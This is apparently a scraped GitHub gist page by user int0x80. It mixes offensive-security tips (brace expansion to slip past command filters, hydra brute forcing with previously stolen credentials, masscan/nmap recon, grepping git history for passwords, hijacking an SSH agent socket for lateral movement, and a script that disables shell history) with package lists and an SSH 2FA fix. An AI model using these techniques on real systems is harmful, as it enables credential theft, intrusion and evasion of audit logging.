int0x80
# From https://twitter.com/ryancdotorg/status/1479171257732112384
# Strict mode for bash
# -u: referencing an unset variable is an error; pipefail: a pipeline fails if any stage fails
set -uo pipefail
# The ERR trap fires whenever a command fails (no set -e needed): report the line and
# command, then exit with the failing command's status
trap 's=$?; echo ": Error on line "$LINENO": $BASH_COMMAND"; exit $s' ERR
# Word-split only on newline and tab, never on spaces
IFS=$'\n\t'

This one blew my mind. An old trick applied in a new way: Shell brace expansion. Simplify your payloads and filter bypass for command execution. No need for spaces or input field separators.

$ file m.{exe,dll}
m.exe: PE32+ executable (console) x86-64, for MS Windows
m.dll: PE32+ executable (DLL) (console) x86-64, for MS Windows

$ {which,-a,curl}
/usr/bin/curl
/bin/curl

Recently learned that hydra can use a list of credentials rather than specifying separate lists of usernames and passwords. Target your bruteforce first with credentials that you have already compromised.

$ hydra -C loot/creds 10.129.3.94 telnet
...
[23][telnet] host: 10.129.3.94   login: security   password: 4Cc3ssC0ntr0ller

$ tail -n 2 loot/creds
backup_admin:admin
security:4Cc3ssC0ntr0ller

Enrich and speed up your port scan recon by using masscan first to identify open ports. Then run service scans with nmap.

$ sudo masscan -p 1-65535,U:1-65535 ${IP} --rate 10000 -oL recon/masscan-${IP}
$ tcp=$(grep -F 'open tcp' recon/masscan-${IP} | awk '{print $3}' | tr '\n' ',' | sed "s/,$//")
$ udp=$(grep -F 'open udp' recon/masscan-${IP} | awk '{print $3}' | tr '\n' ',' | sed "s/,$//")
$ [ -n "${tcp}" ] && sudo nmap -n -A -p ${tcp} ${IP} -oA recon/tcp-${IP} &
$ [ -n "${udp}" ] && sudo nmap -n -sU -A -p ${udp} ${IP} -oA recon/udp-${IP} &

Finding creds in git repos is awesome.

$ for commit in $(seq 1 $(git reflog | wc -l)); do git diff HEAD@{$commit} 2>/dev/null | grep password; done
-spring.datasource.password=g!'301T%y%xT@uL`
+spring.datasource.password=4AT&G;[H@&'\^uDK
-spring.datasource.password=UmAnR=-v|{2=gyx?
+spring.datasource.password=4AT&G;[H@&'\^uDK
...

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld

user@internal:~$ hostname -f
internal.company.tld
int0x80 / digitalocean-vm-packages
Created November 23, 2018 16:23
Packages in a DigitalOcean Debian droplet after quick pruning
acl
adduser
apt
apt-utils
base-files
base-passwd
bash
bash-completion
bsdmainutils
bsdutils
int0x80 / minimal-vm-packages
Last active November 23, 2018 16:24
Packages in Debian VM after initial install
adduser
apt
apt-utils
base-files
base-passwd
bash
bsdmainutils
bsdutils
busybox
console-setup
int0x80 / ssh-2fa-fix.md
Last active April 14, 2017 20:15
Fixing OpenSSH + Google Authenticator on Debian

Recently I was unable to SSH into a host where 2FA was set up via Google Authenticator. The error message looked something like this:

$ ssh someuser@some.host.foo
someuser@some.host.foo's password:
Permission denied, please try again.

No entries were made in auth.log, and nothing had changed on the system aside from doing a dist-upgrade. Thanks to DigitalOcean, I determined one update was needed in /etc/ssh/sshd_config.

int0x80 / nohist.sh
Created November 19, 2016 23:54
Prevent history
unset HISTFILE          # bash: no history file to write to on exit
export HISTSIZE=0       # bash: keep no commands in the in-memory history list
export HISTFILESIZE=0   # bash: allow zero lines in any history file
unset HISTSAVE          # not read by bash; unsetting it is a no-op there
unset HISTLOG           # not read by bash; unsetting it is a no-op there
unset WATCH             # not read by bash; unsetting it is a no-op there